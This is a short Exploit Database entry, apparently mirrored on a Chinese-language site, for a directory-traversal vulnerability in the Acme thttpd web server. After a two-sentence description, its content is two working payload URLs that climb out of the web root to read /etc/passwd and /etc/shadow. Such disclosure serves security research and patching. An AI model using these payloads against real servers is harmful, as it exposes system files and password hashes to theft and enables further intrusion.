Acme thttpd HTTP Server – Directory Traversal

• Exploit Database
• 24 阅读

• 作者： Metropolis
  日期： 2013-05-19
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/38522/

• source: https://www.securityfocus.com/bid/60010/info
  
  thttpd is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
  
  Exploiting this issue will allow an attacker to view arbitrary local files within the context of the web server. Information harvested may aid in launching further attacks. 
  
  www.example.com/../../../../../../../../etc/passwd
  
  www.example.com/../../../../../../../../etc/shadow